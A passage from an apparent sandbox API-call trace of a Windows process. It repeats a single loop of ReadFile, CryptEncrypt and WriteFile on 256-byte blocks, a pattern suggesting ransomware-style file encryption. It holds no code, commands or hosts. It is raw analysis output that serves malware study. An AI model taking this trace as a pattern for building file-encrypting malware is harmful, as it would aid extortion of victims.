lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.524] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.524] GetLastError () returned 0x0 [0167.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.525] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.525] GetLastError () returned 0x0 [0167.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.525] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.525] GetLastError () returned 0x0 [0167.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.525] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.525] GetLastError () returned 0x0 [0167.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.525] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.525] GetLastError () returned 0x0 [0167.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.525] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.525] GetLastError () returned 0x0 [0167.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.525] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.525] GetLastError () returned 0x0 [0167.525] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.525] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.526] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.526] GetLastError () returned 0x0 [0167.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.526] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.526] GetLastError () returned 0x0 [0167.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.526] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.526] GetLastError () returned 0x0 [0167.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.526] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.526] GetLastError () returned 0x0 [0167.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.526] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.526] GetLastError () returned 0x0 [0167.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.526] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.526] GetLastError () returned 0x0 [0167.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.526] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.526] GetLastError () returned 0x0 [0167.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.527] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.527] GetLastError () returned 0x0 [0167.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.527] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.527] GetLastError () returned 0x0 [0167.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.527] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.527] GetLastError () returned 0x0 [0167.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.527] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.527] GetLastError () returned 0x0 [0167.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.527] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.527] GetLastError () returned 0x0 [0167.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.527] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.527] GetLastError () returned 0x0 [0167.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.528] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.528] GetLastError () returned 0x0 [0167.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.528] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.528] GetLastError () returned 0x0 [0167.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.528] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.528] GetLastError () returned 0x0 [0167.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.528] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.528] GetLastError () returned 0x0 [0167.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.528] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.528] GetLastError () returned 0x0 [0167.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.528] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.528] GetLastError () returned 0x0 [0167.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.529] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.529] GetLastError () returned 0x0 [0167.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.529] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.529] GetLastError () returned 0x0 [0167.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.529] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.529] GetLastError () returned 0x0 [0167.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.529] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.529] GetLastError () returned 0x0 [0167.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.529] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.529] GetLastError () returned 0x0 [0167.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.529] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.529] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.529] GetLastError () returned 0x0 [0167.529] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 